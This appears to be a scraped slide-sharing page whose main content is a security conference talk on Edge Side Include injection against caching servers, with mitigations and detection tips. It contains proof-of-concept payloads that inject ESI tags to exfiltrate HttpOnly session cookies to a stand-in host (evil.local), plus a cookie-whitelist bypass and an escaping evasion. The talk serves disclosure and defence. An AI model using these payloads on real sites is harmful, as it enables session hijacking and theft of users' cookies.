CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 

Recently uploaded (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

  • 1. Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
  • 2. Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
  • 3. ESI — Brief Overview
  • 4. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
  • 5. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
  • 6. ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
  • 7. ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
  • 8. ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
  • 9. ESI — Include Network Flow (Cache MISS)
  • 10. ESI — Include Network Flow (Cache MISS) ①/1.html
  • 11. ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
  • 12. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
  • 13. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
  • 14. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
  • 15. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
  • 16. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
  • 17. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
  • 18. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
  • 19. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
  • 20. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
  • 21. ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
  • 22. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 23. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 24. ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
  • 25. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
  • 26. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
  • 27. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
  • 28. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 29. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 30. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
  • 31. DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
  • 32. DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
  • 33. ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
  • 34. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 35. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 36. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
  • 37. DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
  • 38. DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
  • 39. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
  • 40. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
  • 41. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
  • 42. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
  • 43. SSRF with Apache Traffic Server
  • 44. SSRF with Apache Traffic Server
  • 45. SSRF with Apache Traffic Server
  • 46. ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
  • 47. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
  • 48. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
  • 49. ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
  • 50. Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure